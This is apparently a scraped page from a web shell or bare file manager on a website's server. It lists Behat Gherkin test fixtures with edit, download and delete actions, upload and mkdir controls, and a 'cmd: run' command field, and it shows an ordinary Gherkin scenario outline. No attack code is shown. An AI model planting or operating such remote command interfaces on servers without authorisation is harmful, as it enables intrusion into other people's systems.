/
var
/
www
/
vhosts
/
nabawater
/
vendor
/
behat
/
gherkin
/
tests
/
Behat
/
Gherkin
/
Fixtures
/
features
/
/var/www/vhosts/nabawater/vendor/behat/gherkin/tests/Behat/Gherkin/Fixtures/features
mkdir
upload
Name
Size
Mode
Actions
addition.feature
510
0664
edit
dl
rm
background.feature
113
0664
edit
dl
rm
background_title.feature
215
0664
edit
dl
rm
big_pystring.feature
689
0664
edit
dl
rm
clean_tags.feature
151
0664
edit
dl
rm
commented_out.feature
1002
0664
edit
dl
rm
comments.feature
649
0664
edit
dl
rm
complex_descriptions.feature
238
0664
edit
dl
rm
empty.feature
23
0664
edit
dl
rm
empty_scenario.feature
210
0664
edit
dl
rm
empty_scenarios.feature
239
0664
edit
dl
rm
empty_scenario_without_linefeed.feature
210
0664
edit
dl
rm
fibonacci.feature
700
0664
edit
dl
rm
hashes_in_quotes.feature
539
0664
edit
dl
rm
issue_13.feature
318
0664
edit
dl
rm
ja_addition.feature
315
0664
edit
dl
rm
long_title_feature.feature
238
0664
edit
dl
rm
multiline_name.feature
510
0664
edit
dl
rm
multiline_name_with_newlines.feature
741
0664
edit
dl
rm
multiplepystrings.feature
275
0664
edit
dl
rm
outline_with_spaces.feature
863
0664
edit
dl
rm
outline_with_step_table.feature
604
0664
edit
dl
rm
pystring.feature
118
0664
edit
dl
rm
ru_addition.feature
502
0664
edit
dl
rm
ru_commented.feature
245
0664
edit
dl
rm
ru_consecutive_calculations.feature
835
0664
edit
dl
rm
ru_division.feature
787
0664
edit
dl
rm
start_comments.feature
426
0664
edit
dl
rm
tables.feature
466
0664
edit
dl
rm
tags_sample.feature
259
0664
edit
dl
rm
test_unit.feature
237
0664
edit
dl
rm
trimpystring.feature
161
0664
edit
dl
rm
undefined_multiline_args.feature
176
0664
edit
dl
rm
Edit:
/var/www/vhosts/nabawater/vendor/behat/gherkin/tests/Behat/Gherkin/Fixtures/features/tables.feature
(466B)
Feature: A scenario outline # COMMENT Scenario Outline: Given I add <a> and <b> # comment When I pass a table argument | foo | bar | | bar | baz | #comment Then I the result should be <c> # comment And the table should be properly escaped: | \|a | b | c | | 1 | \|2 | 3 | | 2 | 3 | \|4 | #comment Examples: | a | b | c | | 1 | \|2 | 3 | | 2 | 3 | 4 |
Save
cmd:
run